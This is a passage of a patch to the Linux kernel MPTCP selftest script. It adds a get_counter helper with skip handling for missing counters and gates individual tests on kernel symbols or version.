+ 	if [ "$count" != "$fail_tx" ]; then
+ 		extra_msg="$extra_msg,tx=$count"
+ 	fi
+-	if { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
+ 	   { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] TX expected $fail_tx"
+ 		fail_test
+@@ -1228,12 +1324,13 @@ chk_fail_nr()
+ 	fi
+ 
+ 	echo -n " - failrx"
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPFailRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns_rx} "MPTcpExtMPFailRx")
+ 	if [ "$count" != "$fail_rx" ]; then
+ 		extra_msg="$extra_msg,rx=$count"
+ 	fi
+-	if { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
+ 	   { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] RX expected $fail_rx"
+ 		fail_test
+@@ -1265,10 +1362,11 @@ chk_fclose_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "ctx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPFastcloseTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	[ "$count" != "$fclose_tx" ] && extra_msg="$extra_msg,tx=$count"
+-	if [ "$count" != "$fclose_tx" ]; then
++	count=$(get_counter ${ns_tx} "MPTcpExtMPFastcloseTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$fclose_tx" ]; then
++		extra_msg="$extra_msg,tx=$count"
+ 		echo "[fail] got $count MP_FASTCLOSE[s] TX expected $fclose_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1277,10 +1375,11 @@ chk_fclose_nr()
+ 	fi
+ 
+ 	echo -n " - fclzrx"
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPFastcloseRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	[ "$count" != "$fclose_rx" ] && extra_msg="$extra_msg,rx=$count"
+-	if [ "$count" != "$fclose_rx" ]; then
++	count=$(get_counter ${ns_rx} "MPTcpExtMPFastcloseRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$fclose_rx" ]; then
++		extra_msg="$extra_msg,rx=$count"
+ 		echo "[fail] got $count MP_FASTCLOSE[s] RX expected $fclose_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1311,9 +1410,10 @@ chk_rst_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "rtx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPRstTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ $count -lt $rst_tx ]; then
++	count=$(get_counter ${ns_tx} "MPTcpExtMPRstTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ $count -lt $rst_tx ]; then
+ 		echo "[fail] got $count MP_RST[s] TX expected $rst_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1322,9 +1422,10 @@ chk_rst_nr()
+ 	fi
+ 
+ 	echo -n " - rstrx "
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPRstRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" -lt "$rst_rx" ]; then
++	count=$(get_counter ${ns_rx} "MPTcpExtMPRstRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" -lt "$rst_rx" ]; then
+ 		echo "[fail] got $count MP_RST[s] RX expected $rst_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1345,9 +1446,10 @@ chk_infi_nr()
+ 	local dump_stats
+ 
+ 	printf "%-${nr_blank}s %s" " " "itx"
+-	count=$(ip netns exec $ns2 nstat -as | grep InfiniteMapTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$infi_tx" ]; then
++	count=$(get_counter ${ns2} "MPTcpExtInfiniteMapTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$infi_tx" ]; then
+ 		echo "[fail] got $count infinite map[s] TX expected $infi_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1356,9 +1458,10 @@ chk_infi_nr()
+ 	fi
+ 
+ 	echo -n " - infirx"
+-	count=$(ip netns exec $ns1 nstat -as | grep InfiniteMapRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$infi_rx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtInfiniteMapRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$infi_rx" ]; then
+ 		echo "[fail] got $count infinite map[s] RX expected $infi_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1390,9 +1493,10 @@ chk_join_nr()
+ 	fi
+ 
+ 	printf "%03u %-36s %s" "${TEST_COUNT}" "${title}" "syn"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinSynRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$syn_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinSynRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$syn_nr" ]; then
+ 		echo "[fail] got $count JOIN[s] syn expected $syn_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1402,9 +1506,10 @@ chk_join_nr()
+ 
+ 	echo -n " - synack"
+ 	with_cookie=$(ip netns exec $ns2 sysctl -n net.ipv4.tcp_syncookies)
+-	count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtMPJoinSynAckRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$syn_ack_nr" ]; then
++	count=$(get_counter ${ns2} "MPTcpExtMPJoinSynAckRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$syn_ack_nr" ]; then
+ 		# simult connections exceeding the limit with cookie enabled could go up to
+ 		# synack validation as the conn limit can be enforced reliably only after
+ 		# the subflow creation
+@@ -1420,9 +1525,10 @@ chk_join_nr()
+ 	fi
+ 
+ 	echo -n " - ack"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinAckRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$ack_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinAckRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$ack_nr" ]; then
+ 		echo "[fail] got $count JOIN[s] ack expected $ack_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1454,12 +1560,12 @@ chk_stale_nr()
+ 	local recover_nr
+ 
+ 	printf "%-${nr_blank}s %-18s" " " "stale"
+-	stale_nr=$(ip netns exec $ns nstat -as | grep MPTcpExtSubflowStale | awk '{print $2}')
+-	[ -z "$stale_nr" ] && stale_nr=0
+-	recover_nr=$(ip netns exec $ns nstat -as | grep MPTcpExtSubflowRecover | awk '{print $2}')
+-	[ -z "$recover_nr" ] && recover_nr=0
+ 
+-	if [ $stale_nr -lt $stale_min ] ||
++	stale_nr=$(get_counter ${ns} "MPTcpExtSubflowStale")
++	recover_nr=$(get_counter ${ns} "MPTcpExtSubflowRecover")
++	if [ -z "$stale_nr" ] || [ -z "$recover_nr" ]; then
++		echo "[skip]"
++	elif [ $stale_nr -lt $stale_min ] ||
+ 	   { [ $stale_max -gt 0 ] && [ $stale_nr -gt $stale_max ]; } ||
+ 	   [ $((stale_nr - recover_nr)) -ne $stale_delta ]; then
+ 		echo "[fail] got $stale_nr stale[s] $recover_nr recover[s], " \
+@@ -1495,12 +1601,12 @@ chk_add_nr()
+ 	timeout=$(ip netns exec $ns1 sysctl -n net.mptcp.add_addr_timeout)
+ 
+ 	printf "%-${nr_blank}s %s" " " "add"
+-	count=$(ip netns exec $ns2 nstat -as MPTcpExtAddAddr | grep MPTcpExtAddAddr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-
++	count=$(get_counter ${ns2} "MPTcpExtAddAddr")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
+ 	# if the test configured a short timeout tolerate greater then expected
+ 	# add addrs options, due to retransmissions
+-	if [ "$count" != "$add_nr" ] && { [ "$timeout" -gt 1 ] || [ "$count" -lt "$add_nr" ]; }; then
++	elif [ "$count" != "$add_nr" ] && { [ "$timeout" -gt 1 ] || [ "$count" -lt "$add_nr" ]; }; then
+ 		echo "[fail] got $count ADD_ADDR[s] expected $add_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1509,9 +1615,10 @@ chk_add_nr()
+ 	fi
+ 
+ 	echo -n " - echo  "
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtEchoAdd | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$echo_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtEchoAdd")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$echo_nr" ]; then
+ 		echo "[fail] got $count ADD_ADDR echo[s] expected $echo_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1521,9 +1628,10 @@ chk_add_nr()
+ 
+ 	if [ $port_nr -gt 0 ]; then
+ 		echo -n " - pt "
+-		count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtPortAdd | awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$port_nr" ]; then
++		count=$(get_counter ${ns2} "MPTcpExtPortAdd")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$port_nr" ]; then
+ 			echo "[fail] got $count ADD_ADDR[s] with a port-number expected $port_nr"
+ 			fail_test
+ 			dump_stats=1
+@@ -1532,10 +1640,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		printf "%-${nr_blank}s %s" " " "syn"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinPortSynRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$syn_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMPJoinPortSynRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$syn_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] syn with a different \
+ 				port-number expected $syn_nr"
+ 			fail_test
+@@ -1545,10 +1653,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - synack"
+-		count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtMPJoinPortSynAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$syn_ack_nr" ]; then
++		count=$(get_counter ${ns2} "MPTcpExtMPJoinPortSynAckRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$syn_ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] synack with a different \
+ 				port-number expected $syn_ack_nr"
+ 			fail_test
+@@ -1558,10 +1666,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - ack"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinPortAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$ack_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMPJoinPortAckRx")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] ack with a different \
+ 				port-number expected $ack_nr"
+ 			fail_test
+@@ -1571,10 +1679,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		printf "%-${nr_blank}s %s" " " "syn"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMismatchPortSynRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$mis_syn_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMismatchPortSynRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$mis_syn_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] syn with a mismatched \
+ 				port-number expected $mis_syn_nr"
+ 			fail_test
+@@ -1584,10 +1692,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - ack   "
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMismatchPortAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$mis_ack_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMismatchPortAckRx")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$mis_ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] ack with a mismatched \
+ 				port-number expected $mis_ack_nr"
+ 			fail_test
+@@ -1631,9 +1739,10 @@ chk_rm_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "rm "
+-	count=$(ip netns exec $addr_ns nstat -as | grep MPTcpExtRmAddr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$rm_addr_nr" ]; then
++	count=$(get_counter ${addr_ns} "MPTcpExtRmAddr")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$rm_addr_nr" ]; then
+ 		echo "[fail] got $count RM_ADDR[s] expected $rm_addr_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1642,29 +1751,27 @@ chk_rm_nr()
+ 	fi
+ 
+ 	echo -n " - rmsf  "
+-	count=$(ip netns exec $subflow_ns nstat -as | grep MPTcpExtRmSubflow | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ -n "$simult" ]; then
++	count=$(get_counter ${subflow_ns} "MPTcpExtRmSubflow")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ -n "$simult" ]; then
+ 		local cnt suffix
+ 
+-		cnt=$(ip netns exec $addr_ns nstat -as | grep MPTcpExtRmSubflow | awk '{print $2}')
++		cnt=$(get_counter ${addr_ns} "MPTcpExtRmSubflow")
+ 
+ 		# in case of simult flush, the subflow removal count on each side is
+ 		# unreliable
+-		[ -z "$cnt" ] && cnt=0
+ 		count=$((count + cnt))
+ 		[ "$count" != "$rm_subflow_nr" ] && suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
+ 		if [ $count -ge "$rm_subflow_nr" ] && \
+ 		   [ "$count" -le "$((rm_subflow_nr *2 ))" ]; then
+-			echo "[ ok ] $suffix"
++			echo -n "[ ok ] $suffix"
+ 		else
+ 			echo "[fail] got $count RM_SUBFLOW[s] expected in range [$rm_subflow_nr:$((rm_subflow_nr*2))]"
+ 			fail_test
+ 			dump_stats=1
+ 		fi
+-		return
+-	fi
+-	if [ "$count" != "$rm_subflow_nr" ]; then
++	elif [ "$count" != "$rm_subflow_nr" ]; then
+ 		echo "[fail] got $count RM_SUBFLOW[s] expected $rm_subflow_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1685,9 +1792,10 @@ chk_prio_nr()
+ 	local dump_stats
+ 
+ 	printf "%-${nr_blank}s %s" " " "ptx"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPPrioTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$mp_prio_nr_tx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPPrioTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$mp_prio_nr_tx" ]; then
+ 		echo "[fail] got $count MP_PRIO[s] TX expected $mp_prio_nr_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1696,9 +1804,10 @@ chk_prio_nr()
+ 	fi
+ 
+ 	echo -n " - prx   "
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPPrioRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$mp_prio_nr_rx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPPrioRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$mp_prio_nr_rx" ]; then
+ 		echo "[fail] got $count MP_PRIO[s] RX expected $mp_prio_nr_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1726,7 +1835,7 @@ chk_subflow_nr()
+ 
+ 	cnt1=$(ss -N $ns1 -tOni | grep -c token)
+ 	cnt2=$(ss -N $ns2 -tOni | grep -c token)
+-	if [ "$cnt1" != "$subflow_nr" -o "$cnt2" != "$subflow_nr" ]; then
++	if [ "$cnt1" != "$subflow_nr" ] || [ "$cnt2" != "$subflow_nr" ]; then
+ 		echo "[fail] got $cnt1:$cnt2 subflows expected $subflow_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1774,7 +1883,7 @@ wait_attempt_fail()
+ 	while [ $time -lt $timeout_ms ]; do
+ 		local cnt
+ 
+-		cnt=$(ip netns exec $ns nstat -as TcpAttemptFails | grep TcpAttemptFails | awk '{print $2}')
++		cnt=$(get_counter ${ns} "TcpAttemptFails")
+ 
+ 		[ "$cnt" = 1 ] && return 1
+ 		time=$((time + 100))
+@@ -1867,23 +1976,23 @@ subflows_error_tests()
+ 	fi
+ 
+ 	# multiple subflows, with subflow creation error
+-	if reset "multi subflows, with failing subflow"; then
++	if reset_with_tcp_filter "multi subflows, with failing subflow" ns1 10.0.3.2 REJECT &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 REJECT
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 1 1 1
+ 	fi
+ 
+ 	# multiple subflows, with subflow timeout on MPJ
+-	if reset "multi subflows, with subflow timeout"; then
++	if reset_with_tcp_filter "multi subflows, with subflow timeout" ns1 10.0.3.2 DROP &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 DROP
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 1 1 1
+ 	fi
+@@ -1891,11 +2000,11 @@ subflows_error_tests()
+ 	# multiple subflows, check that the endpoint corresponding to
+ 	# closed subflow (due to reset) is not reused if additional
+ 	# subflows are added later
+-	if reset "multi subflows, fair usage on close"; then
++	if reset_with_tcp_filter "multi subflows, fair usage on close" ns1 10.0.3.2 REJECT &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_set_limits $ns2 0 1
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 REJECT
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow &
+ 
+ 		# mpj subflow will be in TW after the reset
+@@ -1995,11 +2104,18 @@ signal_address_tests()
+ 		# the peer could possibly miss some addr notification, allow retransmission
+ 		ip netns exec $ns1 sysctl -q net.mptcp.add_addr_timeout=1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+-		chk_join_nr 3 3 3
+ 
+-		# the server will not signal the address terminating
+-		# the MPC subflow
+-		chk_add_nr 3 3
++		# It is not directly linked to the commit introducing this
++		# symbol but for the parent one which is linked anyway.
++		if ! mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
++			chk_join_nr 3 3 2
++			chk_add_nr 4 4
++		else
++			chk_join_nr 3 3 3
++			# the server will not signal the address terminating
++			# the MPC subflow
++			chk_add_nr 3 3
++		fi
+ 	fi
+ }
+ 
+@@ -2240,7 +2356,12 @@ remove_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.4.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 -8 -8 slow
+ 		chk_join_nr 3 3 3
+-		chk_rm_nr 0 3 simult
++
++		if mptcp_lib_kversion_ge 5.18; then
++			chk_rm_nr 0 3 simult
++		else
++			chk_rm_nr 3 3
++		fi
+ 	fi
+ 
+ 	# addresses flush
+@@ -2479,7 +2600,8 @@ v4mapped_tests()
+ backup_tests()
+ {
+ 	# single subflow, backup
+-	if reset "single subflow, backup"; then
++	if reset "single subflow, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_set_limits $ns2 0 1
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow,backup
+@@ -2489,7 +2611,8 @@ backup_tests()
+ 	fi
+ 
+ 	# single address, backup
+-	if reset "single address, backup"; then
++	if reset "single address, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2500,7 +2623,8 @@ backup_tests()
+ 	fi
+ 
+ 	# single address with port, backup
+-	if reset "single address with port, backup"; then
++	if reset "single address with port, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal port 10100
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2510,14 +2634,16 @@ backup_tests()
+ 		chk_prio_nr 1 1
+ 	fi
+ 
+-	if reset "mpc backup"; then
++	if reset "mpc backup" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+ 		chk_prio_nr 0 1
+ 	fi
+ 
+-	if reset "mpc backup both sides"; then
++	if reset "mpc backup both sides" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+@@ -2525,14 +2651,16 @@ backup_tests()
+ 		chk_prio_nr 1 1
+ 	fi
+ 
+-	if reset "mpc switch to backup"; then
++	if reset "mpc switch to backup" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+ 		chk_prio_nr 0 1
+ 	fi
+ 
+-	if reset "mpc switch to backup both sides"; then
++	if reset "mpc switch to backup both sides" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+@@ -2839,7 +2967,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set fullmesh flag
+-	if reset "set fullmesh flag test"; then
++	if reset "set fullmesh flag test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2849,7 +2978,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set nofullmesh flag
+-	if reset "set nofullmesh flag test"; then
++	if reset "set nofullmesh flag test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow,fullmesh
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2859,7 +2989,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set backup,fullmesh flags
+-	if reset "set backup,fullmesh flags test"; then
++	if reset "set backup,fullmesh flags test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2870,7 +3001,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set nobackup,nofullmesh flags
+-	if reset "set nobackup,nofullmesh flags test"; then
++	if reset "set nobackup,nofullmesh flags test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_set_limits $ns2 4 4
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow,backup,fullmesh
+@@ -2883,14 +3015,14 @@ fullmesh_tests()
+ 
+ fastclose_tests()
+ {
+-	if reset "fastclose test"; then
++	if reset_check_counter "fastclose test" "MPTcpExtMPFastcloseTx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_client
+ 		chk_join_nr 0 0 0
+ 		chk_fclose_nr 1 1
+ 		chk_rst_nr 1 1 invert
+ 	fi
+ 
+-	if reset "fastclose server test"; then
++	if reset_check_counter "fastclose server test" "MPTcpExtMPFastcloseRx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_server
+ 		chk_join_nr 0 0 0
+ 		chk_fclose_nr 1 1 invert
+@@ -2928,7 +3060,8 @@ fail_tests()
+ userspace_tests()
+ {
+ 	# userspace pm type prevents add_addr
+-	if reset "userspace pm type prevents add_addr"; then
++	if reset "userspace pm type prevents add_addr" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+@@ -2939,7 +3072,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type does not echo add_addr without daemon
+-	if reset "userspace pm no echo w/o daemon"; then
++	if reset "userspace pm no echo w/o daemon" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+@@ -2950,7 +3084,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type rejects join
+-	if reset "userspace pm type rejects join"; then
++	if reset "userspace pm type rejects join" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2960,7 +3095,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type does not send join
+-	if reset "userspace pm type does not send join"; then
++	if reset "userspace pm type does not send join" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2970,7 +3106,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type prevents mp_prio
+-	if reset "userspace pm type prevents mp_prio"; then
++	if reset "userspace pm type prevents mp_prio" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2981,7 +3118,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type prevents rm_addr
+-	if reset "userspace pm type prevents rm_addr"; then
++	if reset "userspace pm type prevents rm_addr" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 1
+@@ -2993,7 +3131,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm add & remove address
+-	if reset "userspace pm add & remove address"; then
++	if reset "userspace pm add & remove address" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns2 1 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 userspace_1 0 slow
+@@ -3003,7 +3142,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm create destroy subflow
+-	if reset "userspace pm create destroy subflow"; then
++	if reset "userspace pm create destroy subflow" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
